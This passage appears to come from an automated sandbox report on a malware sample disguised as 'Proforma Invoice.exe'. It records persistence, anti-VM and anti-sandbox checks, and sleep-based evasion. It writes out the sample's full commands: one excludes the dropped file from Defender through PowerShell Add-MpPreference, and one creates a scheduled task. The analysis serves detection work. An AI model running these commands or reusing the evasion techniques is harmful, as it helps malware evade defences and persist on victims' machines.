Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.Proforma Invoice.exe.bd0000.1.unpack, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 0_2_004C9BFE push 380A0001h; ret 0_2_004C9C61
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 0_2_00F598E8 push esp; iretd 0_2_00F598E9
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 0_2_00F51C58 push ebx; iretd 0_2_00F51C7A
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 0_2_053F6DEC push eax; ret 0_2_053F6DED
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_00BD9BFE push 380A0001h; ret 8_2_00BD9C61
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_067818F7 push es; ret 8_2_06781910
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_067818AB push es; ret 8_2_067818C4
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_06782177 push edi; retn 0000h 8_2_06782179
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_06964791 pushfd ; iretd 8_2_0696479D
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Code function: 8_2_06968AA0 push esp; retf 8_2_06968AAD
Source: initial sample | Static PE information: section name: .text entropy: 7.524828218449115
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File created: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match; File source: 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Proforma Invoice.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\Proforma Invoice.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7156; Thread sleep time: -47882s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6640; Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6648; Thread sleep count: 9495 > 30
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 9281
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Window / User API: threadDelayed 9495
Source: C:\Users\user\Desktop\Proforma Invoice.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Thread delayed: delay time: 47882
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Thread delayed: delay time: 922337203685477
Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: O3OXnn329t8NqEmU6p6
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware SVGA II
Source: Proforma Invoice.exe, 00000008.00000002.646996145.0000000006850000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Code function: 8_2_067DA4C0 LdrInitializeThunk,8_2_067DA4C0
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Proforma Invoice.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
